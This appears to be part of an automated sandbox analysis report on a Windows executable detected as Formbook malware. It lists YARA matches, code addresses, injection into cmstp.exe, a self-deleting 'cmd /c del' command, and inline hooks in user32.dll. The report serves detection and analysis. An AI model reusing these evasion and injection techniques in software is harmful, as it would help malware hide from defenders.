          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041D5CF
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E64E
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409E30
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041DFF7
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_009451A1
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0095283A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049320A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04900D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04924120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04926E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CDBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E1EB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E265
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842D87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00849E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E64E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00842FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085DFF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0490B150 appears 35 times
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.254070147.0000000000A28000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000000.253368089.0000000000A48000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs 20210113432.exe
          Source: 20210113432.exeBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\20210113432.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20210113432.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
          Source: 20210113432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\20210113432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Customer] SET [Address] = @Address, [Postal_Code] = @Postal_Code, [Country] = @Country, [C_ID] = @C_ID, [C_City] = @C_City, [C_Phone] = @C_Phone WHERE (((@IsNull_Address = 1 AND [Address] IS NULL) OR ([Address] = @Original_Address)) AND ((@IsNull_Postal_Code = 1 AND [Postal_Code] IS NULL) OR ([Postal_Code] = @Original_Postal_Code)) AND ((@IsNull_Country = 1 AND [Country] IS NULL) OR ([Country] = @Original_Country)) AND ([C_ID] = @Original_C_ID) AND ((@IsNull_C_City = 1 AND [C_City] IS NULL) OR ([C_City] = @Original_C_City)) AND ((@IsNull_C_Phone = 1 AND [C_Phone] IS NULL) OR ([C_Phone] = @Original_C_Phone)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Invoice] ([C_ID], [INV_ID], [M_ID], [Services_Cost], [Inv_Date], [Electr_Cost], [Water_Cost], [Total_Cost]) VALUES (@C_ID, @INV_ID, @M_ID, @Services_Cost, @Inv_Date, @Electr_Cost, @Water_Cost, @Total_Cost);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method);
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Room_Type] ([TYPE_ID], [Name], [Description]) VALUES (@TYPE_ID, @Name, @Description); SELECT TYPE_ID, Name, Des
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Payment_Method] ([M_ID], [Method]) VALUES (@M_ID, @Method); SELECT M_ID, Method FROM Payment_Method WHERE (M_ID
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Services] ([Price], [Name], [Description], [Serv_Date], [S_ID]) VALUES (@Price, @Name, @Description, @Serv_Date, @S_ID);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Customer] ([Address], [Postal_Code], [Country], [C_ID], [C_City], [C_Phone]) VALUES (@Address, @Postal_Code, @Country, @C_ID, @C_City, @C_Phone);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Invoice] SET [C_ID] = @C_ID, [INV_ID] = @INV_ID, [M_ID] = @M_ID, [Services_Cost] = @Services_Cost, [Inv_Date] = @Inv_Date, [Electr_Cost] = @Electr_Cost, [Water_Cost] = @Water_Cost, [Total_Cost] = @Total_Cost WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ([INV_ID] = @Original_INV_ID) AND ((@IsNull_M_ID = 1 AND [M_ID] IS NULL) OR ([M_ID] = @Original_M_ID)) AND ((@IsNull_Services_Cost = 1 AND [Services_Cost] IS NULL) OR ([Services_Cost] = @Original_Services_Cost)) AND ((@IsNull_Inv_Date = 1 AND [Inv_Date] IS NULL) OR ([Inv_Date] = @Original_Inv_Date)) AND ((@IsNull_Electr_Cost = 1 AND [Electr_Cost] IS NULL) OR ([Electr_Cost] = @Original_Electr_Cost)) AND ((@IsNull_Water_Cost = 1 AND [Water_Cost] IS NULL) OR ([Water_Cost] = @Original_Water_Cost)) AND ((@IsNull_Total_Cost = 1 AND [Total_Cost] IS NULL) OR ([Total_Cost] = @Original_Total_Cost)));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Person] ([First_Name], [Last_Name], [SIN]) VALUES (@First_Name, @Last_Name, @SIN); SELECT First_Name, Last_Name
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Person] SET [First_Name] = @First_Name, [Last_Name] = @Last_Name, [SIN] = @SIN WHERE (((@IsNull_First_Name = 1 AND [First_Name] IS NULL) OR ([First_Name] = @Original_First_Name)) AND ((@IsNull_Last_Name = 1 AND [Last_Name] IS NULL) OR ([Last_Name] = @Original_Last_Name)) AND ([SIN] = @Original_SIN));
          Source: 20210113432.exeBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position); SELECT E_ID, Position FROM Employee WHERE (E_ID = @E_
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee] ([E_ID], [Position]) VALUES (@E_ID, @Position);
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Payment_Method] SET [M_ID] = @M_ID, [Method] = @Method WHERE (([M_ID] = @Original_M_ID) AND ((@IsNull_Method = 1 AND [Method] IS NULL) OR ([Method] = @Original_Method)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Rooms] SET [R_ID] = @R_ID, [Price] = @Price, [Smoking_Allowed] = @Smoking_Allowed, [Description] = @Description, [Num_Of_Beds] = @Num_Of_Beds, [Floor] = @Floor WHERE (([R_ID] = @Original_R_ID) AND ((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Smoking_Allowed = 1 AND [Smoking_Allowed] IS NULL) OR ([Smoking_Allowed] = @Original_Smoking_Allowed)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Num_Of_Beds = 1 AND [Num_Of_Beds] IS NULL) OR ([Num_Of_Beds] = @Original_Num_Of_Beds)) AND ((@IsNull_Floor = 1 AND [Floor] IS NULL) OR ([Floor] = @Original_Floor)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Room_Type] SET [TYPE_ID] = @TYPE_ID, [Name] = @Name, [Description] = @Description WHERE (([TYPE_ID] = @Original_TYPE_ID) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Reservation] SET [C_ID] = @C_ID, [Date] = @Date, [RES_ID] = @RES_ID, [R_ID] = @R_ID, [Check_Out_Time] = @Check_Out_Time, [Check_In_Time] = @Check_In_Time WHERE (((@IsNull_C_ID = 1 AND [C_ID] IS NULL) OR ([C_ID] = @Original_C_ID)) AND ((@IsNull_Date = 1 AND [Date] IS NULL) OR ([Date] = @Original_Date)) AND ([RES_ID] = @Original_RES_ID) AND ((@IsNull_R_ID = 1 AND [R_ID] IS NULL) OR ([R_ID] = @Original_R_ID)) AND ((@IsNull_Check_Out_Time = 1 AND [Check_Out_Time] IS NULL) OR ([Check_Out_Time] = @Original_Check_Out_Time)) AND ((@IsNull_Check_In_Time = 1 AND [Check_In_Time] IS NULL) OR ([Check_In_Time] = @Original_Check_In_Time)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Employee] SET [E_ID] = @E_ID, [Position] = @Position WHERE (([E_ID] = @Original_E_ID) AND ((@IsNull_Position = 1 AND [Position] IS NULL) OR ([Position] = @Original_Position)));
          Source: 20210113432.exe, 00000000.00000002.253951343.0000000000922000.00000002.00020000.sdmp, 20210113432.exe, 00000002.00000002.292323607.0000000000942000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Services] SET [Price] = @Price, [Name] = @Name, [Description] = @Description, [Serv_Date] = @Serv_Date, [S_ID] = @S_ID WHERE (((@IsNull_Price = 1 AND [Price] IS NULL) OR ([Price] = @Original_Price)) AND ((@IsNull_Name = 1 AND [Name] IS NULL) OR ([Name] = @Original_Name)) AND ((@IsNull_Description = 1 AND [Description] IS NULL) OR ([Description] = @Original_Description)) AND ((@IsNull_Serv_Date = 1 AND [Serv_Date] IS NULL) OR ([Serv_Date] = @Original_Serv_Date)) AND ([S_ID] = @Original_S_ID));
          Source: 20210113432.exeVirustotal: Detection: 28%
          Source: 20210113432.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\20210113432.exeProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\20210113432.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 20210113432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 20210113432.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 20210113432.exeStatic file information: File size 1070592 > 1048576
          Source: 20210113432.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x104a00
          Source: 20210113432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 20210113432.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.20210113432.exe.920000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.20210113432.exe.920000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.20210113432.exe.940000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.20210113432.exe.940000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0092DD3E push 6F060001h; iretd
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0093862E push 00000000h; iretd
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 0_2_0092FB28 push 73000004h; retf
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00417800 push ebp; retf
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040D8D8 push edi; retf
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409B78 push ecx; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0040F3CD push FFFFFFB4h; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00417BEA push 00000042h; retf
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00409B78 push ecx; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041E47D push eax; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_00405DE5 pushfd ; iretd
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0041DFBD push 0000006Fh; ret
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0094FB28 push 73000004h; retf
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0094DD3E push 6F060001h; iretd
          Source: C:\Users\user\Desktop\20210113432.exeCode function: 2_2_0095862E push 00000000h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0495D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0084D8D8 push edi; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00857800 push ebp; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085D267 push ebx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0084F3CD push FFFFFFB4h; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00857BEA push 00000042h; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00849B78 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085E47D push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_00845DE5 pushfd ; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0085CEFB push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.02780570419

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE8
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\20210113432.exeProcess information set: NOOPENFILEERRORBOX
